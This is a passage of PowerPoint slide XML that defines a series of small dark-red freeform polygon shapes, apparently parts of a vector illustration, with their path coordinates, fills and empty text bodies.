                <a:gd name="T8" fmla="*/ 34 w 34"/>
                <a:gd name="T9" fmla="*/ 31 h 59"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 34"/>
                <a:gd name="T16" fmla="*/ 0 h 59"/>
                <a:gd name="T17" fmla="*/ 34 w 34"/>
                <a:gd name="T18" fmla="*/ 59 h 59"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="34" h="59">
                  <a:moveTo>
                    <a:pt x="34" y="31"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="34" y="59"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="28"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34" y="31"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="800000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10552" name="Freeform 601"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2575" y="3222"/>
              <a:ext cx="17" cy="42"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 17 w 17"/>
                <a:gd name="T1" fmla="*/ 14 h 42"/>
                <a:gd name="T2" fmla="*/ 17 w 17"/>
                <a:gd name="T3" fmla="*/ 42 h 42"/>
                <a:gd name="T4" fmla="*/ 0 w 17"/>
                <a:gd name="T5" fmla="*/ 27 h 42"/>
                <a:gd name="T6" fmla="*/ 0 w 17"/>
                <a:gd name="T7" fmla="*/ 0 h 42"/>
                <a:gd name="T8" fmla="*/ 17 w 17"/>
                <a:gd name="T9" fmla="*/ 14 h 42"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 17"/>
                <a:gd name="T16" fmla="*/ 0 h 42"/>
                <a:gd name="T17" fmla="*/ 17 w 17"/>
                <a:gd name="T18" fmla="*/ 42 h 42"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="17" h="42">
                  <a:moveTo>
                    <a:pt x="17" y="14"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="17" y="42"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="27"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17" y="14"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="600000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10553" name="Freeform 602"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2704" y="3408"/>
              <a:ext cx="11" cy="38"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 11 w 11"/>
                <a:gd name="T1" fmla="*/ 8 h 38"/>
                <a:gd name="T2" fmla="*/ 11 w 11"/>
                <a:gd name="T3" fmla="*/ 38 h 38"/>
                <a:gd name="T4" fmla="*/ 0 w 11"/>
                <a:gd name="T5" fmla="*/ 27 h 38"/>
                <a:gd name="T6" fmla="*/ 0 w 11"/>
                <a:gd name="T7" fmla="*/ 0 h 38"/>
                <a:gd name="T8" fmla="*/ 11 w 11"/>
                <a:gd name="T9" fmla="*/ 8 h 38"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 11"/>
                <a:gd name="T16" fmla="*/ 0 h 38"/>
                <a:gd name="T17" fmla="*/ 11 w 11"/>
                <a:gd name="T18" fmla="*/ 38 h 38"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="11" h="38">
                  <a:moveTo>
                    <a:pt x="11" y="8"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="11" y="38"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="27"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11" y="8"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="800000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10554" name="Freeform 603"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2667" y="3372"/>
              <a:ext cx="35" cy="63"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 35 w 35"/>
                <a:gd name="T1" fmla="*/ 32 h 63"/>
                <a:gd name="T2" fmla="*/ 35 w 35"/>
                <a:gd name="T3" fmla="*/ 63 h 63"/>
                <a:gd name="T4" fmla="*/ 0 w 35"/>
                <a:gd name="T5" fmla="*/ 29 h 63"/>
                <a:gd name="T6" fmla="*/ 0 w 35"/>
                <a:gd name="T7" fmla="*/ 0 h 63"/>
                <a:gd name="T8" fmla="*/ 35 w 35"/>
                <a:gd name="T9" fmla="*/ 32 h 63"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 35"/>
                <a:gd name="T16" fmla="*/ 0 h 63"/>
                <a:gd name="T17" fmla="*/ 35 w 35"/>
                <a:gd name="T18" fmla="*/ 63 h 63"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="35" h="63">
                  <a:moveTo>
                    <a:pt x="35" y="32"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="35" y="63"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="29"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35" y="32"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="800000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10555" name="Freeform 604"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2631" y="3338"/>
              <a:ext cx="35" cy="60"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 35 w 35"/>
                <a:gd name="T1" fmla="*/ 32 h 60"/>
                <a:gd name="T2" fmla="*/ 35 w 35"/>
                <a:gd name="T3" fmla="*/ 60 h 60"/>
                <a:gd name="T4" fmla="*/ 0 w 35"/>
                <a:gd name="T5" fmla="*/ 28 h 60"/>
                <a:gd name="T6" fmla="*/ 0 w 35"/>
                <a:gd name="T7" fmla="*/ 0 h 60"/>
                <a:gd name="T8" fmla="*/ 35 w 35"/>
                <a:gd name="T9" fmla="*/ 32 h 60"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 35"/>
                <a:gd name="T16" fmla="*/ 0 h 60"/>
                <a:gd name="T17" fmla="*/ 35 w 35"/>
                <a:gd name="T18" fmla="*/ 60 h 60"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="35" h="60">
                  <a:moveTo>
                    <a:pt x="35" y="32"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="35" y="60"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="28"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35" y="32"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="800000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10556" name="Freeform 605"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2593" y="3302"/>
              <a:ext cx="35" cy="61"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 35 w 35"/>
                <a:gd name="T1" fmla="*/ 35 h 61"/>
                <a:gd name="T2" fmla="*/ 35 w 35"/>
                <a:gd name="T3" fmla="*/ 61 h 61"/>
                <a:gd name="T4" fmla="*/ 0 w 35"/>
                <a:gd name="T5" fmla="*/ 29 h 61"/>
                <a:gd name="T6" fmla="*/ 0 w 35"/>
                <a:gd name="T7" fmla="*/ 0 h 61"/>
                <a:gd name="T8" fmla="*/ 35 w 35"/>
                <a:gd name="T9" fmla="*/ 35 h 61"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 35"/>
                <a:gd name="T16" fmla="*/ 0 h 61"/>
                <a:gd name="T17" fmla="*/ 35 w 35"/>
                <a:gd name="T18" fmla="*/ 61 h 61"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="35" h="61">
                  <a:moveTo>
                    <a:pt x="35" y="35"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="35" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="29"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35" y="35"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="800000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10557" name="Freeform 606"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2575" y="3286"/>
              <a:ext cx="17" cy="42"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 17 w 17"/>
                <a:gd name="T1" fmla="*/ 14 h 42"/>
                <a:gd name="T2" fmla="*/ 17 w 17"/>
                <a:gd name="T3" fmla="*/ 42 h 42"/>
                <a:gd name="T4" fmla="*/ 0 w 17"/>
                <a:gd name="T5" fmla="*/ 26 h 42"/>
                <a:gd name="T6" fmla="*/ 0 w 17"/>
                <a:gd name="T7" fmla="*/ 0 h 42"/>
                <a:gd name="T8" fmla="*/ 17 w 17"/>
                <a:gd name="T9" fmla="*/ 14 h 42"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 17"/>
                <a:gd name="T16" fmla="*/ 0 h 42"/>
                <a:gd name="T17" fmla="*/ 17 w 17"/>
                <a:gd name="T18" fmla="*/ 42 h 42"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="17" h="42">
                  <a:moveTo>
                    <a:pt x="17" y="14"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="17" y="42"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="26"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17" y="14"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="800000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10558" name="Freeform 607"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2704" y="3479"/>
              <a:ext cx="11" cy="44"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 11 w 11"/>
                <a:gd name="T1" fmla="*/ 13 h 44"/>
                <a:gd name="T2" fmla="*/ 11 w 11"/>
                <a:gd name="T3" fmla="*/ 44 h 44"/>
                <a:gd name="T4" fmla="*/ 0 w 11"/>
                <a:gd name="T5" fmla="*/ 32 h 44"/>
                <a:gd name="T6" fmla="*/ 0 w 11"/>
                <a:gd name="T7" fmla="*/ 0 h 44"/>
                <a:gd name="T8" fmla="*/ 11 w 11"/>
                <a:gd name="T9" fmla="*/ 13 h 44"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 11"/>
                <a:gd name="T16" fmla="*/ 0 h 44"/>
                <a:gd name="T17" fmla="*/ 11 w 11"/>
                <a:gd name="T18" fmla="*/ 44 h 44"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="11" h="44">
                  <a:moveTo>
                    <a:pt x="11" y="13"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="11" y="44"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="32"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11" y="13"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="800000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10559" name="Freeform 608"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2667" y="3443"/>
              <a:ext cx="35" cy="65"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 35 w 35"/>
                <a:gd name="T1" fmla="*/ 35 h 65"/>
                <a:gd name="T2" fmla="*/ 35 w 35"/>
                <a:gd name="T3" fmla="*/ 65 h 65"/>
                <a:gd name="T4" fmla="*/ 0 w 35"/>
                <a:gd name="T5" fmla="*/ 29 h 65"/>
                <a:gd name="T6" fmla="*/ 0 w 35"/>
                <a:gd name="T7" fmla="*/ 0 h 65"/>
                <a:gd name="T8" fmla="*/ 35 w 35"/>
                <a:gd name="T9" fmla="*/ 35 h 65"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 35"/>
                <a:gd name="T16" fmla="*/ 0 h 65"/>
                <a:gd name="T17" fmla="*/ 35 w 35"/>
                <a:gd name="T18" fmla="*/ 65 h 65"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="35" h="65">
                  <a:moveTo>
                    <a:pt x="35" y="35"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="35" y="65"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="29"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35" y="35"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="800000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10560" name="Freeform 609"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2631" y="3405"/>
              <a:ext cx="35" cy="65"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 35 w 35"/>
                <a:gd name="T1" fmla="*/ 37 h 65"/>
                <a:gd name="T2" fmla="*/ 35 w 35"/>
                <a:gd name="T3" fmla="*/ 65 h 65"/>
                <a:gd name="T4" fmla="*/ 0 w 35"/>
                <a:gd name="T5" fmla="*/ 30 h 65"/>
                <a:gd name="T6" fmla="*/ 0 w 35"/>
                <a:gd name="T7" fmla="*/ 0 h 65"/>
                <a:gd name="T8" fmla="*/ 35 w 35"/>
                <a:gd name="T9" fmla="*/ 37 h 65"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 35"/>
                <a:gd name="T16" fmla="*/ 0 h 65"/>
                <a:gd name="T17" fmla="*/ 35 w 35"/>
                <a:gd name="T18" fmla="*/ 65 h 65"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="35" h="65">
                  <a:moveTo>
                    <a:pt x="35" y="37"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="35" y="65"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35" y="37"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="800000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10561" name="Freeform 610"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2594" y="3369"/>
              <a:ext cx="34" cy="63"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 34 w 34"/>
                <a:gd name="T1" fmla="*/ 35 h 63"/>
                <a:gd name="T2" fmla="*/ 34 w 34"/>
                <a:gd name="T3" fmla="*/ 63 h 63"/>
                <a:gd name="T4" fmla="*/ 0 w 34"/>
                <a:gd name="T5" fmla="*/ 28 h 63"/>
                <a:gd name="T6" fmla="*/ 0 w 34"/>
                <a:gd name="T7" fmla="*/ 0 h 63"/>
                <a:gd name="T8" fmla="*/ 34 w 34"/>
                <a:gd name="T9" fmla="*/ 35 h 63"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
